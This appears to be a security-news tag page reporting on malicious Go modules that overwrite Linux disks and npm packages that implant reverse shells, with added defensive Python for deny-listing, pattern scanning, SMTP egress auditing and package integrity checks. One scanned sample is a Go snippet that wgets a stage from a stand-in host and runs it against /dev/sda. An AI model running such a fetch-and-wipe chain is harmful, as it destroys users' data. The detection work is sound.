Tag: supply chain attack

  • Cybersecurity Alert: Malicious Go Modules Found Overwriting Linux Disks

    Researchers at Socket have identified three malicious Go modules, github.com/truthfulpharm/prototransform, github.com/blankloggia/go-mcp and github.com/steelpoor/tlsproxy, published under GitHub module paths. All three contain obfuscated code designed to overwrite a Linux system’s primary disk and leave the machine unbootable.

    Despite looking like legitimate libraries, the modules check whether they are running on Linux and, if so, use wget to fetch a next-stage payload from a remote server. According to Socket researcher Kush Pandya, that payload is a shell script that overwrites the disk in place, which defeats any later recovery attempt.

    “This destructive method ensures no data recovery tool or forensic process can restore the data, as it directly and irreversibly overwrites it,” Pandya stated. Affected machines are left unusable, which makes such packages particularly dangerous given how common software supply chain attacks have become.
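    As an added example (not Socket’s tooling and not code from the report), the following Python audits a go.mod against the three module paths named above and scans Go source for the chain the report describes: a Linux check, a wget fetch and a write to a raw disk device. The sample go.mod and the Go snippet are constructed for the demo, and the indicator regexes are assumptions about how such code is typically written rather than signatures from the report.

```python
import re

# Module paths named in the report above; the only grounded indicators here.
KNOWN_BAD_MODULES = {
    "github.com/truthfulpharm/prototransform",
    "github.com/blankloggia/go-mcp",
    "github.com/steelpoor/tlsproxy",
}

# Behavioural indicators for the described chain (Linux check, wget fetch,
# shell execution, raw-disk device). These regexes are this example's
# assumptions about typical Go code, not signatures taken from the report.
INDICATORS = [
    ("os_check",   re.compile(r'runtime\.GOOS\s*==\s*"linux"')),
    ("wget_fetch", re.compile(r'exec\.Command\(\s*"(?:wget|curl)"')),
    ("shell_exec", re.compile(r'exec\.Command\(\s*"(?:sh|bash)"\s*,\s*"-c"')),
    ("disk_write", re.compile(r'/dev/(?:sd[a-z]|vd[a-z]|nvme\d+n\d+)\b')),
]

def required_modules(go_mod: str) -> set:
    """Module paths from both `require x vN` lines and `require ( ... )` blocks."""
    mods, in_block = set(), False
    for raw in go_mod.splitlines():
        line = raw.split("//", 1)[0].strip()   # drop comments such as "// indirect"
        if not line:
            continue
        if line.startswith("require ("):
            in_block = True
        elif in_block and line == ")":
            in_block = False
        elif in_block:
            mods.add(line.split()[0])
        elif line.startswith("require "):
            mods.add(line.split()[1])
    return mods

def bad_modules(go_mod: str) -> set:
    """Required modules that appear on the deny list."""
    return required_modules(go_mod) & KNOWN_BAD_MODULES

def scan_source(src: str) -> list:
    """Labels of the behavioural indicators present in one Go source file."""
    return [label for label, rx in INDICATORS if rx.search(src)]

def verdict(labels) -> str:
    """Combine indicators: a disk device plus a fetch or shell is the destructive pattern."""
    s = set(labels)
    if "disk_write" in s and ("wget_fetch" in s or "shell_exec" in s):
        return "destructive-dropper"
    if "os_check" in s and "wget_fetch" in s:
        return "downloader"
    return "review" if s else "clean"

# Constructed go.mod for the demo; versions are made up.
SAMPLE_GO_MOD = """module example.com/app

go 1.22

require github.com/steelpoor/tlsproxy v0.1.0

require (
    golang.org/x/crypto v0.23.0 // indirect
    github.com/blankloggia/go-mcp v1.0.2
)
"""

# Constructed Go snippet exhibiting the described chain; it is only scanned, never run.
SAMPLE_SOURCE = '''package tlsproxy

import ("os/exec"; "runtime")

func init() {
    if runtime.GOOS == "linux" {
        exec.Command("wget", "-qO", "/tmp/stage", "http://example.invalid/stage").Run()
        exec.Command("sh", "-c", "/tmp/stage /dev/sda").Run()
    }
}
'''

if __name__ == "__main__":
    print("deny-listed modules:", sorted(bad_modules(SAMPLE_GO_MOD)))
    hits = scan_source(SAMPLE_SOURCE)
    print("indicators:", hits, "->", verdict(hits))
```

    In practice you would run `scan_source` over every file in the module cache (`go env GOMODCACHE`) for each path returned by `required_modules`, and treat a "destructive-dropper" verdict as a build-breaking finding rather than a warning.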

    The disclosure coincides with the discovery of further malicious npm packages, among them crypto-encrypt-ts and react-native-scrollpageviewtest, that steal cryptocurrency private keys and other sensitive data, continuing the trend of attacks aimed at developers and their environments.

    A further set of malicious packages on the Python Package Index (PyPI), downloaded more than 6,800 times in total, shows how widespread these threats are and why developers need to verify packages before installing them.

    Socket’s Olivia Brown encourages developers to audit their dependencies routinely and to verify package authenticity. Brown also advises monitoring for unusual outbound traffic, particularly over SMTP, to catch exfiltration that abuses trusted services such as Gmail.
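    The SMTP-egress check Brown recommends, as an added example that is not part of the original article or Socket’s tooling: the Python below runs a simple policy over constructed connection-log lines and flags SMTP flows from processes that have no business sending mail. The log format, the allowlisted mail host (mail.corp.example) and the list of expected mail clients are assumptions made for the demo; the only grounded detail is that smtp.gmail.com is the kind of trusted destination abused for exfiltration.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

SMTP_PORTS = {25, 465, 587}
# Policy assumptions for the example: the one host developer workstations are
# expected to send mail to, and the only processes expected to speak SMTP.
MAIL_ALLOWLIST = {"mail.corp.example"}
MAIL_CLIENTS = {"thunderbird"}

@dataclass
class Flow:
    ts: str
    host: str
    process: str
    dst_host: str
    dst_ip: str
    dst_port: int
    bytes_out: int

def parse_line(line: str) -> Flow:
    """Constructed format: ts host process dst_host dst_ip dst_port bytes_out."""
    ts, host, proc, dst_host, dst_ip, port, nbytes = line.split()
    return Flow(ts, host, proc, dst_host, dst_ip, int(port), int(nbytes))

def reason(flow: Flow) -> Optional[str]:
    """Why an SMTP flow is suspicious, or None if it looks like ordinary mail."""
    if flow.dst_port not in SMTP_PORTS:
        return None
    if flow.process in MAIL_CLIENTS and flow.dst_host in MAIL_ALLOWLIST:
        return None
    if flow.process in MAIL_CLIENTS:
        return "mail client sending to non-corporate SMTP host %s" % flow.dst_host
    # Interpreters, build tools and package-manager children never need SMTP;
    # a build script talking to Gmail on 587/465 is the exfiltration pattern.
    return "non-mail process %s speaking SMTP to %s:%d" % (
        flow.process, flow.dst_host, flow.dst_port)

def audit(log: str) -> List[Tuple[str, str, str, int]]:
    """(host, process, reason, bytes_out) for every flagged flow."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        f = parse_line(line)
        why = reason(f)
        if why:
            findings.append((f.host, f.process, why, f.bytes_out))
    return findings

# Constructed sample log; addresses are from the documentation range 192.0.2.0/24.
SAMPLE_LOG = """\
2025-05-05T10:01:12Z dev-01 thunderbird mail.corp.example 192.0.2.25 587 2048
2025-05-05T10:02:40Z dev-01 python3 smtp.gmail.com 192.0.2.80 587 18733
2025-05-05T10:03:05Z dev-02 node smtp.gmail.com 192.0.2.80 465 9217
2025-05-05T10:03:30Z dev-02 node registry.npmjs.org 192.0.2.90 443 1200
2025-05-05T10:04:00Z dev-03 thunderbird smtp.gmail.com 192.0.2.80 587 512
"""

if __name__ == "__main__":
    for host, proc, why, nbytes in audit(SAMPLE_LOG):
        print("%s %-12s %6d bytes  %s" % (host, proc, nbytes, why))
```

    The process name is the strongest signal here: an interpreter or build tool such as python3 or node opening port 587 to smtp.gmail.com is worth an immediate look regardless of volume, whereas a mail client reaching a personal Gmail account is a policy question rather than an incident.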

  • New Malicious npm Packages Target Open-Source Systems with Sophisticated Attacks

    Cybersecurity researchers have identified two malicious npm packages, ethers-provider2 and ethers-providerz, that mark a new step in software supply chain attacks on the open-source ecosystem: instead of carrying their full payload themselves, they modify a legitimate package already installed on the victim’s system.

    ethers-provider2 was published on March 15, 2025 and had been downloaded 73 times, so at least some developers installed it. The second package, ethers-providerz, appears to have been removed by its author without attracting any downloads.

    According to ReversingLabs researcher Lucija Valentić, both packages pose as simple downloaders. Their real purpose shows at execution time, when they “patch” the legitimate ethers package installed locally with code that opens a reverse shell.

    Uninstalling the malicious packages does not restore system integrity, because the modifications to the ethers package remain in place. Nor does removing ethers alone help: if ethers-provider2 is still present, ethers is patched again the next time it is installed, and the attacker regains access.

    Further analysis shows that ethers-provider2 is itself a trojanized copy of the legitimate ssh2 package. Its install script fetches additional malware from a remote server and then attempts to erase the traces of its own activity.

    The second package, ethers-providerz, used the same approach but targeted @ethersproject/providers instead, which shows the technique was built to persist in developer environments. Developers should treat such packages with caution, however ordinary they appear.
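    The persistence described in the preceding paragraphs (a patched ethers that survives uninstalling the dropper, and an install hook that reapplies the patch) can be caught with two checks that npm does not perform for you: hashing the files of an installed package against a baseline recorded right after a clean install, and enumerating packages in node_modules that declare preinstall, install or postinstall hooks. The Python below is an added example, not ReversingLabs’ tooling or code from either package; it builds a constructed node_modules tree in a temporary directory, simulates the patch with a harmless marker line, and reports what survives after the dropper is removed.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path
from typing import Dict, List

LIFECYCLE = ("preinstall", "install", "postinstall")

def file_manifest(pkg_dir: Path) -> Dict[str, str]:
    """Relative path -> SHA-256 of every file under one installed package."""
    return {
        p.relative_to(pkg_dir).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(pkg_dir.rglob("*")) if p.is_file()
    }

def diff_manifest(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Files modified, added or removed since the baseline was recorded."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }

def lifecycle_scripts(node_modules: Path) -> Dict[str, Dict[str, str]]:
    """Installed packages (plain or scoped) that declare install-time hooks."""
    found = {}
    manifests = list(node_modules.glob("*/package.json")) + \
                list(node_modules.glob("@*/*/package.json"))
    for pj in manifests:
        meta = json.loads(pj.read_text())
        hooks = {k: v for k, v in meta.get("scripts", {}).items() if k in LIFECYCLE}
        if hooks:
            found[meta.get("name", pj.parent.name)] = hooks
    return found

def build_fixture(root: Path) -> Path:
    """Constructed node_modules: a clean `ethers` plus a package with an install hook.
    Versions and file contents are placeholders, not the real packages."""
    nm = root / "node_modules"
    (nm / "ethers" / "lib").mkdir(parents=True)
    (nm / "ethers" / "package.json").write_text(json.dumps({"name": "ethers", "version": "0.0.0"}))
    (nm / "ethers" / "lib" / "index.js").write_text("module.exports = {};\n")
    (nm / "ethers-provider2").mkdir()
    (nm / "ethers-provider2" / "package.json").write_text(json.dumps({
        "name": "ethers-provider2", "version": "0.0.0",
        "scripts": {"install": "node install.js"},
    }))
    (nm / "ethers-provider2" / "install.js").write_text("// placeholder, no payload\n")
    return nm

def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        nm = build_fixture(Path(tmp))
        hooks_before = lifecycle_scripts(nm)             # dropper is visible by its hook
        baseline = file_manifest(nm / "ethers")          # record right after clean install
        # Simulate the patching step with a constructed marker line (no real payload).
        idx = nm / "ethers" / "lib" / "index.js"
        idx.write_text(idx.read_text() + "// <constructed marker: modified by sibling package>\n")
        shutil.rmtree(nm / "ethers-provider2")           # "npm uninstall" the dropper
        return {
            "hooks_before": hooks_before,
            "hooks_after": lifecycle_scripts(nm),        # nothing left to point at
            "ethers_diff": diff_manifest(baseline, file_manifest(nm / "ethers")),
        }

if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

    The point of the demo is the last two results together: after the dropper is gone, `lifecycle_scripts` reports nothing, yet `ethers_diff` still lists lib/index.js as modified. Only the file-level baseline catches the surviving patch, which is why a clean reinstall from a fresh node_modules, not just removing the offending package, is the right remediation.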

    As these attacks grow more sophisticated, the security community stresses the need for vigilance when using open-source libraries: thorough audits and scrutiny of third-party packages remain essential to keeping development environments secure.